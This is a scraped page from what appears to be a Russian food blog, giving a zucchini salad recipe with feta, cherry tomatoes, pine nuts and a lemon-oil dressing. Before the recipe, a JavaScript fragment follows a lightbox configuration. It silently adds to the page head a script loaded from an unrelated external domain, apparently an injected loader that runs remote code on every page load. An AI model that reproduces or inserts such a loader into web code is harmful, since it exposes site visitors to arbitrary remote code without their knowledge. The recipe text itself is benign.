, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Вкусно + Полезно

Салат из цукини


DSCF2638Цукини — это европейский вариант нашего кабачка. Особой популярностью пользуется, конечно, в Италии. Мне он кажется более интересным по вкусу и своей консистенции, чем наш брат кабачок. А главный его плюс — цукини почти не нужно готовить! Вот , например, как вам такой салат?

Чего и сколько  берем:

1. Цукини — 1 шт.

2. Помидорки Черри — 200/300 гр

3. Сыр Фета — 200 гр.

2. Перчик Чили — 1 шт.

3. Кедровые орехи — 100 гр.

4. Крупные хлебные крошки — 100 гр.

5. Мята, петрушка

Заправка:

1. Оливковое масло — 1/2 стакана

2. Сок лимона — 2 ст. ложки

3. Цедра лимона — 1 ч. ложка

4. Свежемолотый черный перец

 Начинаем готовить:

1. Перец чили очищаем от кожуры (можно предварительно оставить в микроволновке на 5 мин), мелко рубим и перемешиваем с хлебными крошками и орехами. Можно подсолить

2. Нарезаем половинку цукини тонкими лентами,  остальные дольками 2-3 мм толщиной. Ленты цукини кладем в миску и заправляем маслом, солью и перцем

3. Ломтики цукини обжариваем на сковороде гриль  3-5 минут, до появления черных полосок

4. Кладем в миску ленты цукини, обжаренные ломтики,  мелко нарезанные мяту и петрушку, нарезанные на половинки черри, нарезанный кубиками сыр. Аккуратно перемешиваем

5. Готовим заправку: взбиваем лимонную цедру, сок лимона, масло, соль и перец. Добавляем ее в салат и перемешиваем еще раз, стараясь не превратить салатик в кашку

6. Выкладываем на широкое блюдо и посыпаем крошками хлеба с орехами

ПРИЯТНОГО АППЕТИТА!

 

На эту тему вы можете почитать:

Баклажаны с острым соусом
Теплый салат из овощей
Икра из баклажанов

Тэги: ,



Добавить комментарий